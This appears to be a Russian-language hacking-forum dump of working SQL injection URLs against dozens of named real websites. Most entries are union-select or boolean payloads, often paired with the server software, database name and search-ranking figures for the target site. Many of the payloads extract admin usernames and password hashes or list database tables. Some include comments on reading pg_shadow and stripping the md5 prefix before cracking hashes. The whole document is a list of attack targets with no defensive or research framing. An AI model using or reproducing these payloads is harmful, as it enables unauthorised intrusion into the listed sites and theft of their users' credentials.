Code: www.jieyanbar.com/jycs.look.php?ID=286 +union+select+1,%String_Col%,3,4,5-- Host IP: 114.113.148.1 Web Server: Apache/2.2.3 (CentOS) Powered-by: PHP/5.1.6 DB Server: MySQL >=5 Current DB: mlyjy Code: topic.0731fdc.com/Mascot/look.php?id=4+union+select 1,2,%String_Col%-- Host IP: 222.240.149.26 Web Server: Apache/2.2.14 (Unix) Powered-by: PHP/5.2.11 DB Server: MySQL >=4.1 Current DB: 0731fc Code: www.lisenok.ru/look.php?id=1781 UNION ALL SELECT %String_Col%,2,3,4,5-- Host IP: 194.135.105.50 Web Server: Apache/1.3.41 (Unix) PHP/5.2.5 Powered-by: PHP/5.2.5 DB Server: MySQL Current DB: db_lisenok1 Code: www.tunahan.org/look.php?bolm=basin&id=3 UNION ALL SELECT 1,%String_Col%,3,4,5,6-- Host IP: 38.113.1.176 Web Server: Apache Powered-by: PHP/5.2.12 DB Server: MySQL unknown ver Current DB: suleyman Code: www.spravkatver.ru/look.php?cat_id=19&c_id=362&id=3449 AND %True_Expression% Host IP: 77.221.130.43 Web Server: nginx/0.6.32 Powered-by: PHP/5.2.6-1+lenny8 DB Server: MySQL Current DB: ),$ Code: www.xmkj.net/look.php?id=45457 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Host IP: 121.199.124.72 Web Server: Apache/2.0.59 (Unix) DAV/2 mod_jk/1.2.26 Powered-by: PHP/4.4.9 DB Server: MySQL unknown ver Current DB: zky081_db Code: www.stalpraas.com/eng/look.php?id=107 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14-- Host IP: 85.17.197.141 Web Server: Apache/2 Powered-by: PHP/5.2.13 DB Server: MySQL Current DB: stalpraa_website Code: www.diysuits.com/look.php?id=513 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9-- Host IP: 69.163.226.1 Web Server: Apache Powered-by: PHP/5.2.13 DB Server: MySQL >=5 Current DB: frsuitssql
https://ws1.gaslightmedia.com/tomsmoms/retail_shop/display_product.phtml?cust_id=&user_num=&cust_status=guest&zip=&prod_id=4+union+select+null,null,null,null,null,null,null,version()::int--+
--Боян-- http://www.supplierdiversityeurope.eu/news_details.php?id=-82+union+select+1,group_concat(0x0b,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+SDE_users-- http://www.dulam.com/news_details.php?id=-9+union+select+1,2,3,group_concat(0x0b,Username,0x3a,Password),5,6,7,8+from+dulam_admin-- http://www.businessanalytica.ru/ru/news/news_details.php?id=-66+union+select+1,2,3,4,group_concat(0x0b,table_name)+from+information_schema.tables-- http://www.melker-online.de/addinol/news_details.php?id=-14+union+select+1,2,3,4,group_concat(0x0b,table_name),6+from+information_schema.tables-- http://www.a1accommodation.com.au/news_details.php?id=-11+union+select+1,2,3,4,group_concat(0x0b,table_name),6+from+information_schema.tables-- http://www.abraxascorp.com/news_details.php?id=-12+union+select+1,2,group_concat(0x0b,admin_login,0x3a,admin_pass),4,5+from+admin--
newmexicohistory.org пр6 тиц10 Code: http://www.newmexicohistory.org/filedetails.php?fileID=23133+union+select+1,2,3,4,concat_ws(0x3a3a,user_name,password)+from+adminUser+--+ gloriousindia.com пр2 Code: http://www.gloriousindia.com/unleashed/place.php?id=-228659+union+select+1,concat_ws(0x3a3a,email,password,name,pwd),3,4,5,6,7,8,9,10+from+user+--+ celadon-international.com пр3 тиц10 Code: http://www.celadon-international.com/place.php?id=-38+union+select+concat_ws(0x3a3a,username,password)+from+wh_users+--+ finance.tut.by пр5 тиц170 Code: http://finance.tut.by/insurance.php?mode=company&id=-1'+union+select+1,2,concat_ws(0x3a3a,id,username,password,email,type),4,5,6,7,8,9,10,11,12,13+from+users+limit+1,100+--+ 10.of.by пр5 тиц210 Code: http://10.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbmV9pz_pz_pz_&md=shop_newsline&news_id=-2272'+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+group+by+table_schema+limit+2,1+--+
http://www.galeriapresenca.pt/site/index.php?pag=noticias&subpag=detalhe&id=51+union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+from+pg_user--
Code: http://www.davico.co.uk/catalogue.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,concat_ws(char(58),version(),user(),database(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9--+ Version: 5.0.83-community-nt User: davico@localhost Database: davico Os: Win32
http://rantburg.com PR-6 // смотрим версию Postgre http://rantburg.com/poparticle.php?ID=141137+union+select+cast(version() as int)+from+pg_user&D=2006-01-30&SO=&HC=1 // смотрим доступ к pg_shadow http://rantburg.com/poparticle.php?ID=141137+union+select+version()::int+from+pg_shadow&D=2006-01-30&SO=&HC=1 //круто! есть доступ к pg_shadow, попробуем вытащить логин и пароль http://rantburg.com/poparticle.php?ID=141137+union+select+cast(usename||chr(58)||passwd as int)+from+pg_shadow&D=2006-01-30&SO=&HC=1 з.ы хочу напомнить что первые три символа xэша это алгоритм шифрования, в нашем случаe md5, при расшифровке нужно это вырезать
http://www.dwstadium.co.uk/suite.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20-- PR-5 http://www.analisi.ru/info.php?id=-7+union+select+1,group_concat%28column_name%29,3,4%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x70687062625f61636c5f7573657273%20-- PR-60 ТИЦ-3
Скуля: Code: http://www.kuroed.com/?id=158 Колонка: 1 Юзер: kuroed@localhost Версия: 4.1.22-log тИЦ: 90
http://www.alphaonenow.org/info.php?id=-57+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%28column_name%29,2,3,4,5,6,7,8,9,0,1,2%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x76625f61646d696e6973747261746f72%20-- PR-4 http://www.fourstarrealty.com/agent.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20-- PR-3 ТИЦ-10 http://www.premiermontreal.com/agent.php?id=-37+union+select+1,2,3,4,5%20-- http://www.rav-riders.com/doc/motos/moto.php?id=-13+union+select+1,2,user(),4,5,6,7,8,9,0,1,2 -- PR-1 http://www.bullster.com/en/catalogue-moto.php?id=-93312+union+select+1,2,3,4%20-- PR-2 http://katalog.motorky.com/moto.php?id=-98+union+select+1,concat_ws%280x3a,id,username,password%29,3,4,5,6,7,8,9+from+moto_users%20-- PR-4 http://www.banzai-moto.com/concession_kawasaki/banzai-fiche-moto.php?id=-54+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20-- PR-1 http://www.fcl.ru/filial.php?id=-2+union+select+1 -- PR-1 ТИЦ-10
http://infametr.ru/infa/-1079202+'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3+--+ Очень большой траф.
Code: http://www.[COLOR=DarkOrange]smolensk[/COLOR]2.ru/user.php?login=v.v. AND %True_Expression% Host IP: 80.93.48.50 Web Server: Apache/2.2.14 (Fedora) Powered-by: PHP/5.2.9 DB Server: MySQL
http://deti.db.am/play/view/-82977+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21+--+ Поисковая система.
Microsoft SQL Server 2005
MySQL4 под вендой =\
Microsoft SQL Server 2000 с немецкой локализацией
PostgreSQL 8.3.7
MySQL5 без каких-либо признаков таблиц с пользовательскими данными.
шоп http://www.eliteshina.ru/tyreinfo.php?id=285+union+select+version()::int,null,null,null,null,null,null+from+pg_user--
Code: http://www.domoticaviva.com/PHP/newsphp.php?id=-804+union+select+1,2,3,version%28%29,5,6,7,8/* Database Version: 4.1.22 Database name: qbs057 User name: [email protected]
http://spb.egent.ru/metro/metro.php?id=-187+union+select+1,2,3%20-- ТИЦ-20 http://www.agentam.ru/metro.php?id=-139+union+select+concat_ws%280x3a,id_ag,nameco,nam,passwd%29+from+users-- ТИЦ-10 PR-2 http://www.cyb-elles.org/popup/institut.php?id=-3+union+select+1,group_concat%28column_name%29,4,2+from+information_schema.columns+where+table_name=0x62645f666f72756d%20-- ТИЦ-10 PR-3
cerd-rj.com.br pr 2 Code: http://www.cerd-rj.com.br/cartilha.php?secao=12-999.9+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)-- tanaka-usa.com pr 5 тиц 10 Code: http://www.tanaka-usa.com/index.php?section=156-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),9,10,11,12,13,14-- wordsbyrachel.com pr 1 Code: http://wordsbyrachel.com/page.php?go=2-999.9+union+select+1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)--
http://www.chirurgie-hernie-paris.com/institut.php?id=30+and+substring(version(),1,1)=4--+ Version: 4 ---------------- http://www.ipb-ild.edu.rs/institut.php?id=1027+and+substring(version(),1,1)=3 Version: 3 ---------------- http://www.agentam.ru/metro.php?id=-139+union+select+1--+ User: agent_db@localhost Database: agent_db Version: 5.0.77 CY: 10 PR: 2 Users http://www.agentam.ru/metro.php?id=-139+union+select+concat(id_ag,0x3a,ident,0x3a,nameco,0x3a,stat,0x3a,fam,0x3a,nam,0x3a,ot,0x3a,tel1,0x3a,tel2,0x3a,email,0x3a,www,0x3a,icq,0x3a,acc,0x3a,dat_in,0x3a,dat_last,0x3a,col_recs,0x3a,activ,0x3a,ip,0x3a,passwd,0x3a,logo,0x3a,kod,0x3a,smscode)+from+users+limit+0,1--+
Взрыв мозга, MySQL5. Есть таблицы cpg14x_users, fe_users, be_users, evo_users, но на их просмотр, судя по всему, нет прав.